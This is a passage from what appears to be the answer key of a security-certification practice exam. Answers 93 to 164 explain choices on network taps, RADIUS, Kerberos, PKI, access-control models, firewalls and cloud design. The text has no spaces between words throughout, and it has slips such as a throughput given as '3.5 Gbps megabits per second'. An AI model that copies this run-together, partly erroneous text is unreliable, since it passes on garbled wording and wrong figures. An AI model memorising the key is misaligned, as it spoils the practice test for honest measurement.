93. A. Networktapscopyalltraffictoanotherdestination,allowingtrafficvisibilitywithoutadeviceinline.Theyarecompletelypassivemethodsofgettingnetworktraffictoacentrallocation.Portmirroringwouldgetallthetraffictothenetwork-basedintrusionpreventionsystem(NIPS)butisnotcompletelypassive.Itrequirestheuseofresourcesonswitchestorouteacopyofthetraffic.Incorrectswitchconfigurationscancauselooping.Configuringloopdetectioncanpreventloopedports.PuttinganetworkIPSoneverysegmentcanbeveryexpensiveandrequireextensiveconfigurationwork.OptionDisincorrect.Thisisnottheassignment.SettingupaNIPSoneachsegmentwouldalsodramaticallyincreaseadministrativeefforts.


94. C. FederatingRADIUSallowsorganizationstopermitusersfromotherpartnerorganizationstoauthenticateagainsttheirhomesystems,andthenbeallowedontothelocalorganization’snetwork.Anexampleofthisistheeduroamfederationusedbyhighereducationinstitutionstopermitstudents,faculty,andstafftousecollegenetworksanywheretheygowhereeduroamisinplace.Presharedkeysaredeterminedbythelocationorganizationandwouldnotpermitenterprisecredentialsfromotherorganizationstobeused.OpenIDisusedforwebauthentication,and802.11qisatrunkingprotocol.

95. C. Context-awareauthenticationcantakeintoaccountinformationlikegeolocationtoensurethatthedevicescanonlybeloggedintowhentheyareinsideofthefacility’sboundaries.Thatmeansthedeviceswillonlybeusefulon-siteandcanhelpprotectthedataandapplicationsonthedevices.NeitherPINsnorbiometricscandothis,andcontent-awareauthenticationwasmadeupforthisquestion.

96. B. ATPM,orTrustedPlatformModule,isasecurecryptoprocessorusedtoprovideahardwarerootoftrustforsystems.Theyenablesecurebootandbootattestationcapabilities,andincludearandomnumbergenerator,theabilitytogeneratecryptographickeysforspecificuses,andtheabilitytobindandsealdatausedforprocessestheTPMsupports.

97. B. Internetkeyexchange(IKE)isusedtosetupsecurityassociations(SAs)oneachendofthetunnel.Thesecurityassociationshaveallthesettings(i.e.,cryptographicalgorithms,hashes)forthetunnel.IKEisnotdirectlyinvolvedinencryptingorauthenticating.IKEitselfdoesnotestablishthetunnel—itestablishestheSAs.

98. A. Arootcertificateisthebasecertificatethatsignsanentirecertificatechain.AcommonsecuritypracticetoprotecttheseincrediblyimportantcertificatesistokeeptherootcertificateandCAofflinetopreventthepotentialofcompromiseorexposure.Machine/computer,user,andemailcertificatesaredeployedandusedthroughoutorganizationsand,sincetheyareusedonafrequentbasis,aren’tlikelybetokeptoffline.

99. A. TheNIPSisnotseeingthetrafficonthatnetworksegment.Byimplementingportmirroring,thetrafficfromthatsegmentcanbecopiedtothesegmentwheretheNIPSisinstalled.InstallinganetworkIPSonthesegmentwouldrequireadditionalresources.Thiswouldworkbutisnotthemostefficientapproach.NothinginthisscenariosuggeststhattheNIPSisinadequate.Itjustisnotseeingallthetraffic.Finally,isolatingthesegment


toitsownVLANwouldisolatethatnetworksegmentbutwouldstillnotallowtheNIPStoanalyzethetrafficfromthatsegment.

100. B. Tokenizationisusedtoprotectdatabysubstitutingtokensforsensitivedatawithoutchangingthelengthordatatype.Thisallowsdatabasestohandlethedatainthesamewayasitwaspriortotokenization,ensuringthatexistingsoftwarewillnotrunintoproblemsduetothedatabeingchanged.Encryptionprovidessimilarprotectionbutwillnormallychangeeitherthedatalength,thedatatype,orboth.Hashingisone-way,whichmeansitisnotagoodfitformanyscenarioswheretokenizationorencryptionwillprotectdata.Rotationisnotasecuritymethodusedforthistypeofwork.

101. A. Elenoracoulddeployalogaggregatorateachlocationtocollectandaggregatethelogs.Logcollectionandaggregationsystemscanthenfilterunneededlogentries,compressthelogs,andforwarddesiredlogstoacentralsecuritysystemlikeasecurityinformationandeventmanagement(SIEM)orotherloganalysiscollectionandanalysistool.Ahoneypotactslikeadesirabletarget,luringattackersintocapturedataabouttheirattacks.Abastionhostisdesignedtoresistattacksandnormallyprovidesasingleservicetothenetworkonwhichitresides.

102. D. Fuzzingisanautomated,dynamicsoftwaretestingtechniquethatsendsunexpectedandofteninvaliddatatoaprogramtotesthowitresponds.Thesoftwareismonitoredtoseehowitrespondstotheinput,providingadditionalassurancethattheprogramhaspropererrorhandlingandinputvalidationbuiltin.Timeboxingisanagileprojectmanagementtechnique;bufferoverflowsmayoccuraspartoffuzzing,butarenottheonlytechniqueusedordescribedhere;andinputvalidationcanhelpstopfuzzingfromcausingproblemsforanapplicationbypreventingout-of-boundsorunwanteddatafrombeingaccepted.

103. B. DynamicHostConfigurationProtocol(DHCP)snoopingcanbesetuponswitchestomonitorforandstoprogueDHCPtrafficfromunknownservers.DisablingDHCPsnoopingwouldremovethisfeature.Intrusiondetectionsystems(IDSs)cannotstoptraffic,andblockingDHCPtrafficwouldpreventsystemsfromacquiringdynamicIPaddresses.

104. B. Endpointdetectionandresponse(EDR)focusesonidentifyinganomaliesandissues,butitisnotdesignedtobeamalwareanalysistool.Instead,theabilitytosearchandexploredata,identifysuspiciousactivities,


andcoordinateresponsesiswhatmakesupanEDRtool.

105. A. Awebproxycanbeusedtoblockcertainwebsites.Itiscommonpracticefornetworkadministratorstoblockeitherindividualsitesorgeneralclassesofsites(likejob-huntingsites).Networkaddresstranslation(NAT)isusedtotranslatetheprivateIPaddressesofinternalcomputerstopublicIPaddresses.ApacketfilterfirewallcanblocktrafficonagivenportorIPaddressorusingaparticularprotocol,butgenerallytheyarenotabletoblockspecificwebsites.Network-basedintrusionpreventionsystems(NIPSs)identifyandblockattacks;theycannotpreventusersfromvisitingspecificwebsites.

106. C. Secretsmanagementservicesprovidetheabilitytostoresensitivedatalikeapplicationprogramminginterface(API)keys,passwords,andcertificates.Theyalsoprovidetheabilitytomanage,retrieve,andauditthosesecrets.Apublickeyinfrastructure(PKI)wouldfocusoncertificatesandencryptionkeys,withoutpasswordsorAPIkeys.ATrustedPlatformModule(TPM)isassociatedwithhardware,andahushservicewasmadeupforthisquestion.

107. A. SAML,theSecurityAssertionMarkupLanguage,isusedbymanyidentityproviderstoexchangeauthorizationandauthenticationdatawithserviceproviders.KerberosandLDAP(LightweightDirectoryAccessProtocol)areusedinsidemanyorganizations,butFredwillfindmoresuccesswithSAMLforpopularwebservices.NewTechnologyLANManager(NTLM)remainsinuseforWindowssystems,butKerberosismorecommonlyusedformodernWindowsdomainsandwouldnotbeusedinthescenariodescribedhere.

108. D. Loadbalancingtheclusterwillpreventanysingleserverfrombeingoverloaded.Andifagivenserverisoffline,otherserverscantakeonitsworkload.OptionAisincorrect.AVPNconcentrator,asthenamesuggests,isusedtoinitiatevirtualprivatenetworks(VPNs).OptionBisincorrect.Aggregateswitchingcanshuntmorebandwidthtotheserversbutwon’tmitigatethethreatofoneormoreserversbeingoffline.OptionCisincorrect.SSLacceleratorsareamethodofoffloadingprocessor-intensivepublic-keyencryptionforTransportLayerSecurity(TLS)andSecureSocketsLayer(SSL)toahardwareaccelerator.

109. C. Thethreechannelsthatdonotoverlapare1,6,and11.Therestofthechannelswilloverlap.Inanidealinstallation,thesethreechannelscanbe


usedtomaximizethroughputandminimizeinterference.

110. B. ThecorrectansweristoencryptallthewebtraffictothisapplicationusingTransportLayerSecurity(TLS).Thisisoneofthemostfundamentalsecuritystepstotakewithanywebsite.Awebapplicationfirewall(WAF)isprobablyagoodidea,butitisnotthemostimportantthingforRyantoimplement.Whileanetwork-basedintrusionpreventionsystem(IPS)orintrusiondetectionsystem(IDS)maybeagoodidea,thoseshouldbeconsideredafterTLSisconfigured.

111. B. Infrared(IR)istheonlyline-of-sightmethodonthelist.AlthoughNear-FieldCommunication(NFC)andBluetoothhavearelativelyshortrange,theycanstilloperatethroughmaterialsplacedbetweenthemandthereceiver,andWi-Ficandosoatanevenlongerrange.

112. A. ThecorrectansweristhatKerberosusesvarioustickets,eachwithatimelimit.Theserviceticketsaretypicallyonlygoodfor5minutesorless.ThismeansthatiftheNetworkTimeProtocol(NTP)isfailing,validticketsmayappeartobeexpired.RADIUS,CHAP,andLDAPwillnothaveanysignificanteffectduetoNTPfailure.

113. C. ThecorrectansweristhatChallengeHandshakeAuthenticationProtocol(CHAP)periodicallyhastheclientreauthenticate.Thisistransparenttotheuserbutisdonespecificallytopreventsessionhijacking.PasswordAuthenticationProtocol(PAP)isactuallyquiteoldanddoesnotreauthenticate.Infact,itevensendsthepasswordincleartext,soitshouldnotbeusedanylonger.SPAP(ShivaPasswordAuthenticationProtocol)addspasswordencryptiontoPAPbutdoesnotreauthenticate.OAuthisusedinwebauthenticationanddoesnotreauthenticate.

114. B. Asoftwarefirewallisbestsuitedtodeploymentstoindividualmachines,particularlywhenendpointsystemsarebeingprotected.Hardwarefirewallsaretypicallydeployedtoprotectnetworksegmentsorgroupsofsystems,andresultinadditionalexpenseandmanagement.Virtualandcloudfirewallsaremostoftendeployedindatacenterswherevirtualorcloudenvironmentsareinuse,althoughavirtualfirewallcouldberunonanendpoint.

115. D. Aserviceaccountisthemostappropriateinthisscenario.Serviceaccountsaregiventheleastprivilegestheserviceneedsandareusedbytheservice,withouttheneedforahumanuser.Althoughyoucouldassignauseraccount,itisnotasgoodasolutionasusingaserviceaccount.Aguest


accountwouldneverbeagoodideaforaservice.Guestaccountsaretypicallytoolimited.It’scommonpracticetodisabledefaultaccountssuchastheGuestaccount.Anadminaccountwouldgivetoomanyprivilegestotheserviceandviolatetheprincipleofleastprivileges.

116. A. OftheseversionsofExtensibleAuthenticationProtocol(EAP),onlyLightweightExtensibleAuthenticationProtocol(LEAP)doesnotsupportTLS.EAPTunneledTransportLayerSecurity(EAP-TTLS)actuallyextendsTLS,butsupportstheunderlyingprotocol.ProtectedExtensibleAuthenticationProtocol(PEAP)encapsulatesEAPwithinanencryptedTLStunnel.

117. C. JailbreakingallowsuserstoaddsoftwaretoaniPhonethatisn’tnormallyallowed,includingthird-partyapplications,changingsystemsettings,themes,ordefaultapplications.Third-partyapplicationstoresaren’tavailablebydefault,andside-loadingcanbeaccomplishediniOSbutdoesn’tdowhatMannywantsitto,andofcourseinstallingAndroidwon’tletMannychangeiOSsettings.IfMannydoesjailbreakhisphone,hisorganizationmaynoticeifthey’reusingamobiledevicemanagement(MDM)orunifiedendpointmanagement(UEM)applicationtotrackthestatusofthedevice.

118. C. ManysmartcardsimplementRadioFrequencyIdentification(RFID)toallowthemtobeusedforentryaccessandotherpurposes.Wi-Fi,Infrared,andBluetoothgenerallyrequirepoweredcircuitstointeractwithsystems,makingthemapoorfitforasmartcardthatdoesnottypicallyhaveabatteryorotherpowersource.

119. A. Mandatoryaccesscontrol(MAC)isthecorrectsolution.Itwillnotallowlowerprivilegeduserstoevenseethedataatahigherprivilegelevel.Discretionaryaccesscontrol(DAC)haseachdataownerconfigurehisorherownsecurity.Role-basedaccesscontrol(RBAC)couldbeconfiguredtomeettheneeds,butit’snotthebestsolutionfortheserequirements.SecurityAssertionMarkupLanguage(SAML)isnotanaccesscontrolmodel.

120. B. Anagent-based,preadmissionsystemwillprovidegreaterinsightintotheconfigurationofthesystemusingtheagent,andusingapreadmissionmodelwillallowthesystemconfigurationtobetestedbeforethesystemisallowedtoconnecttothenetwork.AgentlessNACusesscanningand/ornetworkinventorytechniquesandwilltypicallynothaveasdeepalevelof


insightintotheconfigurationandsoftwareversionsrunningonasystem.Postadmissionsystemsmakeenforcementdecisionsbasedonwhatusersdoaftertheygainadmissiontoanetwork,ratherthanpriortogainingadmission,allowingyoutoquicklyruleouttwooftheseoptions.

121. C. Claire’sbestoptionistodeployadetectionandfixviaherwebapplicationfirewall(WAF)thatwilldetecttheSQLinjectionattemptandpreventit.Anintrusiondetectionsystem(IDS)onlydetectsattacksandcannotstopthem.Manuallyupdatingtheapplicationcodeafterreverse-engineeringitwilltaketime,andshemaynotevenhavethesourcecodeortheabilitytomodifyit.Finally,vendorpatchesforzerodaystypicallytakesometimetocomeouteveninthebestofcircumstances,meaningthatClairecouldbewaitingonapatchforquiteawhileifthatistheoptionshechooses.

122. C. CYOD,orchooseyourowndevice,allowsuserstochooseadevicethatiscorporateownedandpaidfor.Choicesmaybelimitedtosetofdevices,orusersmaybeallowedtochooseessentiallyanydevicedependingontheorganization’sdeploymentdecisions.BYODallowsuserstobringtheirowndevice,whereasCOPE,orcorporate-owned,personallyenabled,providesdevicestousersthattheycanthenuseforpersonaluse.VDIusesavirtualdesktopinfrastructureasanaccesslayerforanysecuritymodelwherespecializedneedsorsecurityrequirementsmayrequireaccesstoremotedesktoporapplicationservices.

123. B. Thekeyelementhereisthatthecertificateauthorities(CA)areoperatinginamesh,meaningnoCAistherootCAandthateachmusttrusttheothers.Toaccomplishthis,DerekfirstneedstoissuecertificatesfromDtoeachoftheotherCasandthenhavetheothersissueDacertificate.Privatekeysshouldneverbeexchanged,andofcourseifheonlyhastheothersystemsissueDcertificates,theywon’trecognizehisserver.

124. C. IfClaireisusingSimpleNetworkManagementProtocol(SNMP)tomanageandmonitorhernetworkdevices,sheshouldmakesuresheisusingSNMPv3andthatitisproperlyconfigured.SNMPv3canprovideinformationaboutthestatusandconfigurationofhernetworkdevices.RemoteAuthenticationDial-InUserService(RADIUS)mightbeusedtoauthenticatetothenetwork,butTransportLayerSecurity(TLS)andSSHFileTransferProtocol(SFTP)arenotspecificallyusedforthepurposesdescribed.


125. D. Fuzzerssendunexpectedandoutofrangedatatoapplicationstoseehowtheywillrespond.Inthiscase,Benisusingafuzzer.Webproxiesareoftenusedtodoapplicationtestingbecausetheyallowdatatobechangedbetweenthebrowserandtheapplication.SQLinjectionmaybedoneviaawebproxy,butadedicatedSQLinjectionproxyisnotatypeoftoolbyitself.Finally,astaticcodereviewtoolisusedtoreviewsourcecodeandmaybeassimpleasaNotepadapplicationorascomplexasafullyintegrateddevelopmentenvironment(IDE).

126. B. ContainerizationwillallowEric’scompany’stoolsanddatatoberuninsideofanapplication-basedcontainer,isolatingthedataandprogramsfromtheself-controlledbringyourowndevice(BYOD)devices.Storagesegmentationcanbehelpful,buttheoperatingsystemitselfaswellastheapplicationswouldremainaconcern.Ericshouldrecommendfull-deviceencryption(FDE)asasecuritybestpractice,butencryptingthecontainerandthedataitcontainscanprovideareasonablesecuritylayerevenifthedeviceitselfisnotfullyencrypted.Remotewipeishelpfulifdevicesarelostorstolen,buttheendusermaynotbeokaywithhavingtheentiredevicewiped,andtherearewaystoworkaroundremotewipes,includingblockingcellularandWi-Fisignals.

127. B. Kerberosdoesnotsendtheuserspasswordacrossthenetwork.Whentheuser’snameissenttotheauthenticationservice,theserviceretrievesthehashoftheuser’spasswordfromthedatabase,andthenusesthatasakeytoencryptdatatobesentbacktotheuser.Theuser’smachinetakesthepasswordthattheuserentered,hashesit,andthenusesthatasakeytodecryptwhatwassentbackbytheserver.ChallengeHandshakeAuthenticationProtocol(CHAP)sendstheuser’spasswordinanencryptedform.RBACisanaccesscontrolmodel,notanauthenticationprotocol.TypeIIauthenticationissomethingyouhave,suchasakeyorcard.

128. A. EV,orextendedvalidation,certificatesprovethattheX.509certificatehasbeenissuedtothecorrectlegalentity.Inaddition,onlyspecificcertificateauthorities(Cas)canissueEVcertificates.Domain-validatedcertificatesrequireproofthatyouhavecontrolofthedomain,suchassettingtheDNSTXTrecordorrespondingtoanemailsenttoacontactinthedomain’sWhoisrecord.Anorganizationalvalidationcertificaterequireseitherdomainvalidationandadditionalproofthattheorganizationisalegalentity.OCSPcertificatesweremadeupforthisquestion.

129. D. Wi-Fi5networkscanprovidetheoreticalthroughputupto3.5Gbps


megabitspersecond,althoughnewerstandardslikeWi-Fi6continuetopushthishigher.ThenextfastestwirelessstandardlistedisLTEcellularwiththeoreticalthroughputsaround50megabitspersecond.Whenbandwidthisimportant,Wi-Fiwilltendtowin,although5GcellularnetworksunderidealconditionsmayrivalWi-Fi.

130. C. Thecostofapplicationsandthequalityofthesecurityimplementationcanvarybasedonthevendorandproduct,butcloud-nativesecuritysolutionswillgenerallyhavebetteranddeeperintegrationintothecloudplatformthanthird-partysolutionswill.Vendordiversityindesignsmaystilldriveotherchoices,butthoseareconsciousdesigndecisions.

131. D. Jumpboxesareacommonsolutionforprovidingaccesstoanetworkwithadifferentsecurityprofile.Inthiscase,Edcandeployajumpboxinthedemilitarizedzone(DMZ)toallowuserswithinhisadministrativezonetoperformtaskswithoutdirectlyconnectingtotheworld-exposedDMZ.Thishelpskeepadministrativesystemssecureandallowshimtofocusonthesecurityofthejumpbox,whilealsomakingiteasiertomonitorandmaintain.Anintrusionpreventionsystem(IPS)isusedtomonitorandblockunwantedtraffic,butisn’tusedforremoteaccess.ANATgatewayperformsnetworkaddresstranslationandisplacedbetweennetworksbutisnottypicallyusedtoprovidesecureconnectionsbetweennetworks.Instead,itservestoreducethenumberofpublicIPaddressesusedandtoprovidesomelimitedsecurityforsystemsbehindit.Routersareusedtoconnecttonetworksbutarenotusedtoprovidesecureaccessasdescribedinthequestion.

132. C. OAuth(OpenAuthorization)isanopenstandardfortoken-basedauthenticationandauthorizationontheInternetandallowsanenduser’saccountinformationtobeusedbythird-partyservices,withoutexposingtheuser’spassword.Kerberosisanetworkauthenticationprotocolandnotusedforcross-domain/serviceauthentication.SecurityAssertionMarkupLanguage(SAML)isanXML-based,open-standarddataformatforexchangingauthenticationandauthorizationdatabetweenparties.OpenIDisanauthenticationserviceoftenprovidedbyathirdparty,anditcanbeusedtosignintoanywebsitethatacceptsOpenID.Itwouldbepossibleforthistowork,butonlywithwebsitesthatsupportOpenID,soitisnotasgoodasolutionasOAuth.

133. A. Sessionpersistencemakessurethatallofaclient’strafficforatransactionorsessiongoestothesameserverorservice.Theremaining


optionsdonotproperlydescribehowsessionpersistenceworks.

134. B. Datalossprevention(DLP)toolsallowsensitivedatatobetaggedandmonitoredsothatifauserattemptstosendit,theywillbenotified,administratorswillbeinformed,andifnecessary,thedatacanbeprotectedusingencryptionorotherprotectionmethodsbeforeitissent.Full-diskencryption(FDE)wouldprotectdataatrest,andS/MIMEandPOP3SwouldprotectmailbeingretrievedfromaserverbutwouldnotpreventtheSSNsfrombeingsent.

135. B. Whileinfrastructureasaservice(IaaS)vendorsoftenprovidestrongsupportforhighavailability,includingreplicationtomultiplegeographiczonesorregions,aswellashighlyreliableandsecurestorage,theydonotallowdirectaccesstotheunderlyinghardwareinmostinstances.IfJenniferrequiresdirectaccesstohardware,shewillneedtodeploytoadatacenterwhereshecanretainaccesstothephysicalservers.

136. B. Out-of-band(OOB)managementusesseparatemanagementinterfaces,asshowninthefigure,oradifferentconnectivitymethodthanthenormalconnectiontoprovideasecuremeansofmanagingsystems.ADMZ,ordemilitarizedzone,isasecurityzonethatistypicallyexposedtotheworldandisthuslesstrustedandmoreexposed.In-bandmanagementusescommonprotocolslikeSecureShell(SSH)orHTTPStomanagedevicesviatheirnormalinterfacesornetworkconnections.TransportLayerSecurity(TLS)isasecurityprotocol,notamanagementinterface.

137. A. Keyescrowprovidesencryptionkeystoathirdpartysothattheycanbereleasedtoanappropriatepartyifcertainconditionsaremet.Althoughthismeansthatthekeysareoutofthecontroloftheowningorresponsibleparty,inmanycasestheneedtohavearecoverableoraccessiblewaytogettothekeysoverridestherequirementtokeepthekeysinasingleindividualororganization’shands.Theremainingoptionsweremadeup,butyoumayencountertheterm“keyrecovery,”whichisaprocesswherelawenforcementorotherpartiesmayrecoverkeyswhenneededusingaprocessthatprovidesthemwithanaccesskeyordecryptionkeythatmaynotbethesamekeyasthekeyusedbytheoriginalencryptionuser.

138. D. Bootattestationrequiressystemstotrackandmeasurethebootprocessandtothenattesttoasystemthattheprocesswassecure.Secureboot,whichisarelatedconcept,allowsonlytrustedsoftwaretoberunusingpreviouslyhashedvaluestoensuretheprocessissecure.BOOTPandBIOS


arenotinvolvedinthisprocess,instead,UnifiedExtensibleFirmwareInterface(UEFI)firmwaresupportsbothsecurebootandbootattestation.

139. A. ThecorrectansweristhatOpenIDisanauthenticationserviceoftendonebyathirdparty,anditcanbeusedtosignintoanywebsitethatacceptsOpenID.Kerberosisanetworkauthenticationprotocolforusewithinadomain.NewTechnologyLANManager(NTLM)isanolderWindowsauthenticationprotocol.Shibbolethisasinglesign-onsystem,butitworkswithfederatedsystems.

140. C. Disablingremoteregistryaccessforsystemsthatdonotrequireitcanpreventremoteregistrymodificationandreads.Thisisarecommendedbestpracticewheneverpossible,butsomesystemsmayrequireremoteregistryaccessformanagementorotherreasons.TheWindowsregistryisnotindependentlypatched,theregistryneedstobereadableandwritabletohaveafunctionalWindowssystem,andthereisnomodethatencryptsuserkeys.

141. D. Maximizingcoverageoverlapwouldcausegreatercontentionbetweenaccesspoints.Instead,installationsshouldminimizeoverlapwithoutleavingdeadspotsinimportantareas.Performingasitesurvey,controllingpowerlevelsandadjustingthemtominimizecontention,anddesigningaroundtheconstructionmaterialsofabuildingareallimportantpartsofdesigningthephysicallayoutandplacementofWAPs.Fortunately,modernenterprisewirelessnetworkshaveadvancedintelligentfeaturesthathelpdomanyofthesethingssomewhatautomatically.

142. B. DisablingtheaccountisthebestoptiontomeetMark’sneeds.Disablinganaccountwillleaveitinadifferentstatethananactiveaccountoronewithachangedpassword,whichshouldbenotedbysupportstaffifGabbycalledandaskedtochangeherpassword.Thatmeansthatthereislessriskofadisgruntledemployeeoranattackersuccessfullygainingaccesstotheaccount.Atthesametime,disablingislessdestructivethandeletingtheaccount,makingitfastertorestoreandpreservingherfilesandothermaterials.Mostorganizationswillchoosetohaveatimelimitforhowlonganaccountcanbeinadisabledstatewithoutreviewormovingtoanotheraccountstatetohelpensurethatdisabledaccountsdonotbuildupovertime.

143. A. Attribute-basedaccesscontrol(ABAC)looksatagroupofattributes,inadditiontotheloginusernameandpassword,tomakedecisionsabout


whetherornottograntaccess.Oneoftheattributesexaminedisthelocationoftheperson.Sincetheusersinthiscompanytravelfrequently,theywilloftenbeatnewlocations,andthatmightcauseABACtorejecttheirlogins.Wrongpasswordscancertainlypreventlogin,butarenotspecifictoABAC.ABACdoesnotpreventremoteaccess,andafirewallcanbeconfiguredtoallow,orprohibit,anytrafficyouwish.

144. B. SingleSign-On(SSO)isdesignedspecificallytoaddressthisriskandwouldbethemosthelpful.Usershaveonlyasinglelogontoremember;thus,theyhavenoneedtowritedownthepassword.OAuth(OpenAuthorization)isanopenstandardfortoken-basedauthenticationandauthorizationontheInternet.Itdoesnoteliminatetheuseorneedformultiplepasswords.Multifactorauthenticationhelpspreventrisksduetolostpasswords,butdoesnotremovetheneedformultiplepasswordsbyitself.SecurityAssertionMarkupLanguage(SAML)andLightweightDirectoryAccessProtocol(LDAP)donotstopusersfromneedingtoremembermultiplepasswords.

145. D. Rule-basedaccesscontrolappliesasetofrulestoanaccessrequest.Basedontheapplicationoftherules,theusermaybegivenaccesstoaspecificresourcethattheywerenotexplicitlygrantedpermissionto.MAC,DAC,androle-basedaccesscontrolwouldn’tgiveauseraccessunlessthatuserhasalreadybeenexplicitlygiventhataccess.

146. B. Segmentationneedsbetweenmultiplecloudvirtualdatacenters,thecostofoperatingthefirewallservice,andthevisibilityintotrafficprovidedbythecloudserviceproviderarealldesignelementsEdwillneedtoconsider.Hewon’t,however,needtoworryabouthardwareaccessforupdates.Instead,heislikelytoeitheruseavirtualcloudapplianceorbuilt-infirewallfunctionalityprovidedbythecloudinfrastructureserviceprovider.

147. B. Tokensarephysicaldevicesthatoftencontaincryptographicdataforauthentication.Theycanstoredigitalcertificatesforusewithauthentication.OAuth(OpenAuthorization)isanopenstandardfortoken-basedauthenticationandauthorizationontheInternet.Theuserstillmustrememberapassword.OpenIDisathird-partyauthenticationservice,andjustaswithOAuth,theuseralsostillmustrememberapassword.Role-basedaccesscontrolandrule-basedaccesscontrol(whichbothusetheacronymRBAC)areaccesscontrolmodels.


148. A. Internalserviceslikethisarepartofanintranet,anetwork,orwebsiteonlyaccessibletoindividualsandsystemsinsideofacompany.Extranetsareprivatenetworksthatallowaccesstopartnersorcustomers,butnottothegeneralpublic.Ademilitarizedzone(DMZ)isanetworksegmentexposedtotheInternetoranotheruntrustednetwork.ATTLisanetworktermthatmeanstimetolive,anditdetermineshowmanyhopsapacketcanmakebeforeitisnolongerabletobesenttoanotherhop.

149. B. Thisquestiondescribesastatelessfirewall,whichlooksateverypackettomakedecisionsaboutwhatwillbeallowedthroughit.Statefulfirewallspayattentiontheconversationsandallowpacketsinaconversationbetweendevicestopassthroughonceithasverifiedtheinitialexchange.Next-generationfirewalls(NGFWs)buildinawidevarietyofsecurityservices.Application-layerfirewallsunderstandapplicationsthatrunthroughthemandprovidedeeperpacketanalysiscapabilitiestoblockunwantedapplicationlayertraffic.

150. C. Hardwaresecuritymodulesareavailableassmartcards,microSDcards,andUSBthumbdrivesinadditiontotheirfrequentdeploymentasappliancesinenterpriseuse.NancycouldpurchaseacertifiedandtestedMicroSDcard–basedHSMthatwouldprotectherkeysinasecureway.Anapplication-basedpublickeyinfrastructure(PKI)wouldnotprovidethesamelevelofsecurityonmostmobiledeviceswithoutspeciallydesignedhardware,whichisnotmentionedinthisproblem.OPALisahardware-basedencryptionstandardanddoesnotprovidekeymanagement,andanofflinecertificateauthority(CA)wouldnothelpinthiscircumstance.

151. D. BoththeWindowsandLinuxfilesystemsworkbasedonadiscretionaryaccesscontrolschemewherefileanddirectoryownerscandeterminewhocanaccess,change,orotherwiseworkwithfilesundertheircontrol.Role-basedaccesscontrolssystemsdeterminerightsbasedonrolesthatareassignedtousers.Rule-basedaccesscontrolsystemsuseaseriesofrulestodeterminewhichactionscanoccur,andmandatoryaccesscontrolsystemsenforcecontrolattheoperatingsystemlevel.

152. A. Restrictingeachfacultyaccountsothatitisonlyusablewhenthatparticularfacultymemberistypicallyoncampuswillpreventsomeonefromlogginginwiththataccountafterhours,eveniftheyhavethepassword.Usageauditingmaydetectmisuseofaccountsbutwillnotpreventit.Longerpasswordsareeffectivesecurity,butalongerpasswordcanstillbestolen.Credentialmanagementisalwaysagoodidea,butit


won’taddressthisspecificissue.

153. D. Althoughnext-generationfirewallsprovidemaydefensivecapabilities,SQLinjectionisanattackinsteadofadefense.Inadditiontogeolocation,intrusiondetectionsystem(IDS)andintrusionpreventionsystem(IPS),andsandboxingcapabilities,manynext-generationfirewallsincludewebapplicationfirewalls,loadbalancing,IPreputationandURLfiltering,andantimalwareandantivirusfeatures.

154. C. Enablingstormcontrolonaswitchwilllimittheamountoftotalbandwidththatbroadcastpacketscanuse,preventingbroadcaststormsfromtakingdownthenetwork.BlockingAddressResolutionProtocol(ARP)wouldpreventsystemsfromfindingeachother,andblockingallbroadcastpacketswouldalsoblockmanyimportantnetworkfeatures.

155. B. Demilitarizedzones(DMZs)remainausefulconceptwhendesigningcloudenvironments,althoughthetechnicalimplementationmayvary,sincecloudprovidersmayhavesecurewebservices,load-balancingcapabilitiesorotherfeaturesthatmakeDMZslookdifferent.Proxyserversareusefulforcontrolling,filtering,andrelayingtraffic,buttheydonotprovidethefullsegmentationthatIsaacislookingfor.AVPCisavirtualdatacenterandwilltypicallycontainhisinfrastructurebutdoesnotspecificallyaddresstheseneeds.

156. A. Apermissionsauditwillfindwhatpermissionseachuserhasandcomparethattotheirjobrequirements.Permissionauditsshouldbeconductedperiodically.Jobrotation,thoughbeneficialforothersecurityreasons,willactuallyexacerbatethisproblem.Itisimpracticaltoforbidanyonefromeverchangingjobroles,andseparationofdutieswouldhavenoimpactonthisissue.

157. B. Susan’sbestoptionistodeployfull-diskencryption(FDE),whichwillensurethattheentiredriveisencrypted,ratherthanjustspecificfoldersorfiles.Degaussingmagneticdriveswillwipethem,ratherthanprotectingdata.

158. C. Passwordcomplexityrequiresthatpasswordshaveamixtureofuppercaseletters,lowercaseletters,numbers,andspecialcharacters.Thiswouldbethebestapproachtocorrecttheproblemdescribedinthequestion.Longerpasswordsareagoodsecuritymeasurebutwillnotcorrecttheissuepresentedhere.Changingpasswordswon’tmakethosepasswordsanystronger,andSingleSign-On(SSO)willhavenoeffectonthestrength


ofpasswords.

159. D. WPA3’sPersonalmodereplacesthepresharedkeymodefoundinWPA2withsimultaneousauthenticationofequals.Thismakesweakpassphraseorpasswordattackshardertoconductandallowsforgreatersecuritywhendevicesareconductingtheirinitialkeyexchange.WEP,WPA,andWPA2donotimplementSAE.

160. C. Meganhascreatedaguestaccount.Guestaccountstypicallyhaveverylimitedprivilegesandmaybesetupwithlimitedloginhours,anexpirationdate,orothercontrolstohelpkeepthemmoresecure.Useraccountsarethemostcommontypeofaccountandareissuedtoindividualstoallowthemtologintoandusesystemsandservices.Sharedaccountsareusedbymorethanoneperson,makingitdifficulttodeterminewhousedtheaccount.Aserviceaccountistypicallyassociatedwithaprogramorservicerunningonasystemthatrequiresrightstofilesorotherresources.

161. B. APIkeysallowindividualcustomerstoauthenticatetotheAPIservice,whichmeansthatifthereisaproblemHenrycandisabletheproblematicAPIkeysratherthanallusers.EnablingloggingusingaservicelikeAmazon’sAPIGatewayallowsscalability,logging,andmonitoring,aswellastoolslikewebapplicationfirewalls.AnAPIproxyandAPI-centricintrusionpreventionsystem(IPS)weremadeupforthisquestion.

162. C. UTM,orunifiedthreatmanagement,devicescommonlyserveasfirewalls,intrusiondetectionsystem(IDS)/intrusionpreventionsystem(IPS),antivirus,webproxies,webapplicationanddeeppacketinspection,secureemailgateways,datalossprevention(DLP),securityinformationandeventmanagement(SIEM),andevenvirtualprivatenetworking(VPN)devices.Theyaren’tmobiledevicemanagement(MDM)oruniversalendpointmanagementdevices,however,sincetheirprimaryfocusisonnetworksecurity,notsystemsordevicemanagement.

163. B. Mandatoryaccesscontrol(MAC)isbasedondocumentedsecuritylevelsassociatedwiththeinformationbeingaccessed.Role-basedaccesscontrol(RBAC)isbasedontheroletheuserisplacedin.Discretionaryaccesscontrol(DAC)letsthedataownersetaccesscontrol.BACisnotanaccesscontrolmodel.

164. A. Thisimageshowsaforwardproxy,whichcanbeusedtoapplypoliciestouserrequestssenttowebserversandotherservices.Reverseproxiesactasgatewaysbetweenusersandapplicationservers,allowingcontent


